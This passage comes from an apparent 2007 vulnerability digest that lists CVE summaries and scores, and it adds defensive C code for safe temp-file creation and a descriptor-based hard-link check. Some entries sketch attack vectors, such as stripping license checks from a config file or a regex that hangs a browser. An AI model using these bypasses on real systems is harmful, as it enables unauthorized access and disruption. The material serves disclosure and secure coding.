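    printf("mistyped size would be short: %d\n", mistyped_size_is_short());
    return 0;
}
```

Whether the wrong constant happens to be larger or smaller than the right one depends on how the two enumerations grow over time, which is why the guard compares against the enumeration that indexes the table rather than against any particular number.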
2007-04-19 CVE-2007-1009 Macrovision Authentication Bypass vulnerability in Macrovision Installanywhere 8

Macrovision InstallAnywhere Enterprise before 8.0.1 uses the InstallScript.iap_xml configuration file without integrity protection to verify authorization for installing an application, which allows local users to perform unauthorized installations by removing the (1) password or (2) serial number verification sections from this file.

4.6
2007-04-18 CVE-2007-2074 Scramdisk 4 Linux Local Privilege Escalation vulnerability in ScramDisk 4 Linux

Certain programs in containers in ScramDisk 4 Linux before 1.0-1 execute with SUID permissions, which allows local users to gain privileges via mounted containers.

4.6
2007-04-18 CVE-2007-2110 Oracle, Microsoft Multiple vulnerabilities in Oracle Database Server 10.1.0.4/9.0.1.5/9.2.0.7

Unspecified vulnerability in the Core RDBMS component for Oracle Database 9.0.1.5+, 9.2.0.7, and 10.1.0.4 on Windows systems has unknown impact and attack vectors, aka DB03.

4.4
2007-04-18 CVE-2007-2063 SSH Permissions, Privileges, and Access Controls vulnerability in SSH Tectia Server 5.0/5.1.0/5.2.0

SSH Tectia Server for IBM z/OS before 5.4.0 uses insecure world-writable permissions for (1) the server pid file, which allows local users to cause arbitrary processes to be stopped, or (2) when _BPX_BATCH_UMASK is missing from the environment, creates HFS files with insecure permissions, which allows local users to read or modify these files and have other unknown impact.

4.4
2007-04-22 CVE-2007-2161 Microsoft Unspecified vulnerability in Microsoft Internet Explorer 7.0

Microsoft Internet Explorer 7 allows remote attackers to cause a denial of service (browser hang) via JavaScript that matches a regular expression against a long string, as demonstrated using /(.)*/.

4.3
2007-04-22 CVE-2007-2159 Drupal Cross-Site Scripting vulnerability in Drupal Database Administration Module 4.6/4.7

Multiple cross-site scripting (XSS) vulnerabilities in the Database Administration (dba) module 4.6.x-*, and before 4.7.x-1.2 in the 4.7.x-1.* series, for Drupal allow remote attackers to inject arbitrary web script or HTML via unspecified vectors relating to (1) direct display of data from the database and (2) other portions of the user interface.

4.3
2007-04-18 CVE-2007-2071 Open Gorotto HTML-injection vulnerability in Open-Gorotto 2.0A

Multiple cross-site scripting (XSS) vulnerabilities in Open-gorotto 2.0a 2006/02/08 edition, 2006/03/19 edition, and 2006/04/07 edition before 20070416 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) pub/modules/d/_top.html; (2) /pub/modules/a/_access.html; (3) _circletop.html or (4) _cir66.html in pub/modules/ci/; or (5) _fri66.html, (6) _inv66.html, (7) _top.html, (8) _friends.html, or (9) _fri33.html in pub/modules/f/.

4.3
2007-04-18 CVE-2007-2061 Afterlogic Cross-Site Scripting vulnerability in Afterlogic Mailbee Webmail 3.4

Cross-site scripting (XSS) vulnerability in check_login.asp in AfterLogic MailBee WebMail Pro 3.4 allows remote attackers to inject arbitrary web script or HTML via the username parameter.

4.3
2007-04-16 CVE-2007-2041 Cisco Remote vulnerability in Cisco products

Cisco Wireless LAN Controller (WLC) before 4.0.206.0 saves the WLAN ACL configuration with an invalid checksum, which prevents WLAN ACLs from being loaded at boot time, and might allow remote attackers to bypass intended access restrictions, aka Bug ID CSCse58195.

4.0

3 Low Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2007-04-16 CVE-2007-2037 Cisco Resource Management Errors vulnerability in Cisco Wireless LAN Controller Software 3.2/4.0/4.0.108

Cisco Wireless LAN Controller (WLC) before 3.2.116.21, and 4.0.x before 4.0.155.0, allows remote attackers on a local network to cause a denial of service (device crash) via malformed Ethernet traffic.

2.9
2007-04-16 CVE-2007-1558 Apop Protocol Unspecified vulnerability in the APOP protocol

The APOP protocol allows remote attackers to guess the first 3 characters of a password via man-in-the-middle (MITM) attacks that use crafted message IDs and MD5 collisions.

2.6
2007-04-18 CVE-2007-1856 Gentoo, Paul Vixie Local Denial of Service vulnerability in Vixie Cron ST_Nlink Check

Vixie Cron before 4.1-r10 on Gentoo Linux is installed with insecure permissions, which allows local users to cause a denial of service (cron failure) by creating hard links, which results in a failed st_nlink check in database.c.

2.1
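Two entries in this report concern files in shared directories: lha's insecurely created temporary files (CVE-2007-2030, above) and Vixie cron's st_nlink check failing when a local user adds hard links (CVE-2007-1856, immediately above). The C below is an added example for this report, not code from lha, cron or Gentoo: it creates a temp file the way lha should (mkstemp, so a pre-planted name is rejected rather than followed) and then applies the cron-style check to the open descriptor, showing why a second hard link makes that check fail. It only touches files it creates itself under TMPDIR.

```c
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Create a fresh temporary file. mkstemp randomises the name and opens it
 * with O_CREAT|O_EXCL and mode 0600, so a file or symlink planted at a
 * guessable name (the lha weakness) makes the call fail rather than being
 * followed or overwritten. Returns the open fd (or -1) and fills path. */
int create_private_temp(char *path, size_t pathlen)
{
    const char *dir = getenv("TMPDIR");
    if (!dir || !*dir) dir = "/tmp";
    int n = snprintf(path, pathlen, "%s/example.XXXXXX", dir);
    if (n < 0 || (size_t)n >= pathlen) return -1;
    return mkstemp(path);
}

/* The cron-style check, applied to an fd we already hold so there is no
 * window between check and use: regular file, exactly one hard link,
 * owned by us, not group/world accessible. Returns 1 if acceptable. */
int fd_is_private_file(int fd)
{
    struct stat st;
    if (fstat(fd, &st) != 0) return 0;
    if (!S_ISREG(st.st_mode)) return 0;
    if (st.st_nlink != 1) return 0;          /* an extra link fails here */
    if (st.st_uid != geteuid()) return 0;
    if (st.st_mode & (S_IRWXG | S_IRWXO)) return 0;
    return 1;
}

/* Exercise the check on files this example creates itself: a fresh temp
 * file passes, adding a second hard link makes it fail (what a local user
 * could do to a crontab in a writable spool), and removing the link
 * restores it. Returns 1 when all three observations hold. */
int demo_nlink_check(void)
{
    char path[1024], link_path[1040];
    int fd = create_private_temp(path, sizeof path);
    if (fd < 0) return 0;

    int ok = fd_is_private_file(fd);
    snprintf(link_path, sizeof link_path, "%s.lnk", path);
    if (ok && link(path, link_path) == 0) {
        ok = !fd_is_private_file(fd);        /* st_nlink is now 2 */
        unlink(link_path);
        ok = ok && fd_is_private_file(fd);   /* back to 1 */
    } else {
        ok = 0;
    }
    unlink(path);
    close(fd);
    return ok;
}

int main(void)
{
    printf("nlink check sequence %s\n",
           demo_nlink_check() ? "behaved as expected" : "FAILED");
    return 0;
}
```

The check is deliberately run on the descriptor, not the path: checking a path with stat() and then opening it leaves a race that a local user can win with a rename or symlink swap. The Gentoo problem was the opposite failure, a legitimate file failing the check because the directory permissions let others add links to it, which is why the directory mode matters as much as the file mode.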